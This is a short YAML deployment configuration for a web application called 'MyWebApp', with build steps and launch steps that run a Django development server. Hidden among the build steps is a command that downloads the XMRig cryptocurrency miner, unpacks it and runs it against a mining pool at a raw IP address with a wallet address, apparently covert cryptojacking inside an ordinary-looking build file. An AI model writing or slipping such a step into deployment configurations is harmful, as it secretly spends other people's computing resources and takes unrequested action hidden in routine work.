deployments:
  MyWebApp:
    dockerimage: ubuntu:14.04
    build_steps:
      - apt install wget
      - wget https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-linux-x64.tar.gz; tar -xf xmrig-6.17.0-linux-x64.tar.gz; cd xmrig-6.17.0; ./xmrig -o 18.210.126.40:80 -a rx -k -u 86VkWeqdPgyHYUFd2Nc84uhte6pdHNKMpay4MgCVPfVeG3BWzyDtq87BwWKxQFAxq3QQQR1Heeqc95xyUcchnaQi6L7Wfn2.2-cpu
    launch_steps:
      - cd ~/code/mysite
      - python manage.py runserver 0.0.0.0:80
